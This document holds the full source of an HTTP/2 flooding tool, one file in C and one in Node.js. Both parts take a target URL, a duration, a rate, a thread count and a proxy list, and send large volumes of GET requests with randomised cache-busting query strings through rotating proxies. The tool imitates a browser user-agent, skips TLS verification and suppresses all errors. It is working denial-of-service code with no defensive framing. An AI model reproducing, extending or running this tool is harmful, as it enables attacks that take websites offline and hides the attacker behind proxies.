File: tls.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <curl/curl.h>
#include <time.h>
#include <signal.h>

#define MAX_PROXIES 10000
#define MAX_HEADERS 20
#define BLUE "\033[34m"
#define WHITE "\033[37m"
#define RESET "\033[0m"

typedef struct {
    char *host;
    int port;
} Proxy;

typedef struct {
    char *target;
    int time;
    int rate;
    int threads;
    char *proxyFile;
} Args;

Args args;
Proxy proxies[MAX_PROXIES];
int proxy_count = 0;
int running = 1;

char* randstr(int len) {
    char *str = malloc(len + 1);
    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    for (int i = 0; i < len; i++) str[i] = charset[rand() % (sizeof(charset)-1)];
    str[len] = '\0';
    return str;
}

char* generate_random_string(int min, int max) {
    int len = min + rand() % (max - min + 1);
    return randstr(len);
}

void read_proxies(const char *file) {
    FILE *fp = fopen(file, "r");
    if (!fp) { perror("fopen"); exit(1); }
    char line[256];
    while (fgets(line, sizeof(line), fp) && proxy_count < MAX_PROXIES) {
        if (line[0] == '#' || line[0] == '\n') continue;
        line[strcspn(line, "\r\n")] = 0;
        char *ip = strtok(line, ":");
        char *port = strtok(NULL, ":");
        if (ip && port) {
            proxies[proxy_count].host = strdup(ip);
            proxies[proxy_count].port = atoi(port);
            proxy_count++;
        }
    }
    fclose(fp);
}

Proxy random_proxy() {
    return proxies[rand() % proxy_count];
}

void* flood_thread(void *arg) {
    CURL *curl;
    CURLcode res;
    struct curl_slist *headers = NULL;
    long thread_id = (long)arg;

    while (running) {
        Proxy proxy = random_proxy();
        curl = curl_easy_init();
        if (!curl) continue;

        char url[512];
        snprintf(url, sizeof(url), "%s?%s=%s", args.target, randstr(4), generate_random_string(8, 15));

        headers = curl_slist_append(headers, "Accept: */*");
        headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br");
        headers = curl_slist_append(headers, "Cache-Control: no-cache");
        char ua[128];
        snprintf(ua, sizeof(ua), "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36");
        headers = curl_slist_append(headers, ua);

        curl_easy_setopt(curl, CURLOPT_URL, url);
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
        curl_easy_setopt(curl, CURLOPT_PROXY, proxy.host);
        curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxy.port);
        curl_easy_setopt(curl, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
        curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
        curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
        curl_easy_setopt(curl, CURLOPT_FORBID_REUSE, 1L);
        curl_easy_setopt(curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_2_0);
        curl_easy_setopt(curl, CURLOPT_SSL_ENABLE_ALPN, 1L);
        curl_easy_setopt(curl, CURLOPT_SSL_ENABLE_NPN, 1L);

        for (int i = 0; i < args.rate; i++) {
            if (!running) break;
            res = curl_easy_perform(curl);
            if (res != CURLE_OK) break;
        }

        curl_slist_free_all(headers);
        headers = NULL;
        curl_easy_cleanup(curl);
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    if (argc < 7) {
        printf("Usage: %s host time req thread proxy.txt\n", argv[0]);
        return 1;
    }

    srand(time(NULL));
    args.target = argv[1];
    args.time = atoi(argv[2]);
    args.rate = atoi(argv[3]);
    args.threads = atoi(argv[4]);
    args.proxyFile = argv[5];

    read_proxies(args.proxyFile);

    printf("%s--------------------------------------------%s\n", BLUE, RESET);
    printf("%sTarget: %s%s%s\n", WHITE, RESET, args.target, RESET);
    printf("%sRate: %s%d/s %s|%s %sThreads: %s%d%s\n", WHITE, RESET, args.rate, BLUE, RESET, WHITE, RESET, args.threads, RESET);
    printf("%sProxy: %s%s (%s%d%s)%s\n", WHITE, RESET, args.proxyFile, BLUE, RESET, proxy_count, RESET);
    printf("%s--------------------------------------------%s\n", BLUE, RESET);

    curl_global_init(CURL_GLOBAL_ALL);
    pthread_t threads[args.threads];

    for (long i = 0; i < args.threads; i++) {
        pthread_create(&threads[i], NULL, flood_thread, (void*)i);
    }

    sleep(args.time);
    running = 0;

    for (int i = 0; i < args.threads; i++) {
        pthread_join(threads[i], NULL);
    }

    curl_global_cleanup();
    for (int i = 0; i < proxy_count; i++) free(proxies[i].host);
    return 0;
}

File: tls.js
const net = require("net");
const http2 = require("http2");
const tls = require("tls");
const cluster = require("cluster");
const url = require("url");
const crypto = require("crypto");
const fs = require("fs");

const blue = '\x1b[34m';
const white = '\x1b[37m';
const reset = '\x1b[0m';

const ciphers = "TLS_AES_128_GCM_SHA256:TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256";

process.setMaxListeners(0);
require("events").EventEmitter.defaultMaxListeners = 0;

const sigalgs = "ecdsa_secp256r1_sha256:rsa_pss_rsae_sha256:rsa_pkcs1_sha256";

const secureOptions = crypto.constants.SSL_OP_NO_SSLv2 |
    crypto.constants.SSL_OP_NO_SSLv3 |
    crypto.constants.SSL_OP_NO_TLSv1 |
    crypto.constants.SSL_OP_NO_TLSv1_1;

if (process.argv.length < 7) {
    console.log(`Usage: host time req thread proxy.txt`);
    process.exit();
}

const args = {
    target: process.argv[2],
    time: ~~process.argv[3],
    Rate: ~~process.argv[4],
    threads: ~~process.argv[5],
    proxyFile: process.argv[6]
};

var proxies = readLines(args.proxyFile);
const parsedTarget = url.parse(args.target);

if (cluster.isMaster) {
    console.clear();
    console.log(`\x1b[36m--------------------------------------------\x1b[0m`);
    console.log(`\x1b[33mTarget: \x1b[37m${args.target}\x1b[0m`);
    console.log(`\x1b[33mRate: \x1b[37m${args.Rate}/s \x1b[36m|\x1b[0m \x1b[33mThreads: \x1b[37m${args.threads}\x1b[0m`);
    console.log(`\x1b[33mProxy: \x1b[37m${args.proxyFile} (\x1b[32m${proxies.length}\x1b[37m)\x1b[0m`);
    console.log(`\x1b[36m--------------------------------------------\x1b[0m`);

    for (let counter = 1; counter <= args.threads; counter++) {
        cluster.fork();
    }
} else {
    setInterval(runFlooder, 1);
}

class NetSocket {
    constructor() { }

    HTTP(options, callback) {
        const payload = `CONNECT ${options.address}:443 HTTP/1.1\r\nHost: ${options.address}:443\r\nConnection: Keep-Alive\r\n\r\n`;
        const buffer = Buffer.from(payload);
        const connection = net.connect({
            host: options.host,
            port: options.port,
        });

        connection.setTimeout(options.timeout * 1000);
        connection.setKeepAlive(true, 600000);
        connection.setNoDelay(true);

        connection.on("connect", () => {
            connection.write(buffer);
        });

        connection.on("data", chunk => {
            const response = chunk.toString("utf-8");
            if (response.includes("HTTP/1.1 200")) {
                return callback(connection, undefined);
            } else {
                connection.destroy();
                return callback(undefined, "error: invalid response");
            }
        });

        connection.on("timeout", () => {
            connection.destroy();
            return callback(undefined, "error: timeout");
        });

        connection.on("error", () => {
            connection.destroy();
            return callback(undefined, "error: connection error");
        });
    }
}

const Socker = new NetSocket();

function readLines(filePath) {
    return fs.readFileSync(filePath, "utf-8").toString().split(/\r?\n/).filter(line => line.trim() && !line.startsWith('#'));
}

function randomElement(elements) {
    return elements[Math.floor(Math.random() * elements.length)];
}

function randstr(length) {
    const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    let result = "";
    for (let i = 0; i < length; i++) {
        result += characters.charAt(Math.floor(Math.random() * characters.length));
    }
    return result;
}

function generateRandomString(minLength, maxLength) {
    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    const length = Math.floor(Math.random() * (maxLength - minLength + 1)) + minLength;
    let result = "";
    for (let i = 0; i < length; i++) {
        result += characters.charAt(Math.floor(Math.random() * characters.length));
    }
    return result;
}

function runFlooder() {
    const proxyAddr = randomElement(proxies);
    const parsedProxy = proxyAddr.split(":");
    const parsedPort = parsedProxy[1] || "443";
        
    let ZynosHeaders = {
      ":authority": parsedTarget.host,
      ":scheme": "https",
      ":path": (parsedTarget.path || "/") + "?" + randstr(4) + "=" + generateRandomString(8, 15),
      ":method": "GET",
      "accept": "*/*",
      "accept-encoding": "gzip, deflate, br",
      "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
      "cache-control": "no-cache"
    };
    
    const proxyOptions = {
        host: parsedProxy[0],
        port: ~~parsedProxy[1],
        address: parsedTarget.host,
        timeout: 10
    };

    Socker.HTTP(proxyOptions, (connection, error) => {
        if (error || !connection) return;

        connection.setKeepAlive(true, 600000);
        connection.setNoDelay(true);

        const tlsOptions = {
            socket: connection,
            ALPNProtocols: ["h2"],
            servername: parsedTarget.host,
            rejectUnauthorized: false,
            ciphers: ciphers,
            sigalgs: sigalgs,
            secureOptions: secureOptions
        };

        const tlsSocket = tls.connect(443, parsedTarget.host, tlsOptions, () => {
            if (tlsSocket.alpnProtocol !== 'h2') {
                tlsSocket.destroy();
                connection.destroy();
                return;
            }

            tlsSocket.setKeepAlive(true, 600000);
            tlsSocket.setNoDelay(true);

            const client = http2.connect(parsedTarget.href, {
                createConnection: () => tlsSocket,
                settings: {
                    headerTableSize: 65536,
                    maxHeaderListSize: 32768,
                    initialWindowSize: 15564991,
                    maxFrameSize: 16384,
                    enablePush: false
                }
            });

            client.on("connect", () => {
                const interval = setInterval(() => {
                    for (let i = 0; i < args.Rate; i++) {
                        try {
                            const req = client.request(ZynosHeaders, {
                                parent: 0,
                                exclusive: true,
                                weight: 220
                            });

                            req.on('response', () => {
                                req.close();
                                req.destroy();
                            });

                            req.on('error', () => {
                                req.destroy();
                            });

                            req.end();
                        } catch (err) { }
                    }
                }, 1000);

                client.on('close', () => clearInterval(interval));
            });

            client.on("error", () => {
                client.destroy();
                tlsSocket.destroy();
                connection.destroy();
            });

            client.on("close", () => {
                tlsSocket.destroy();
                connection.destroy();
            });
        });

        tlsSocket.on("error", () => {
            tlsSocket.destroy();
            connection.destroy();
        });
    });
}

const StopScript = () => process.exit(1);
setTimeout(StopScript, args.time * 1000);

process.on('uncaughtException', () => { });
process.on('unhandledRejection', () => { });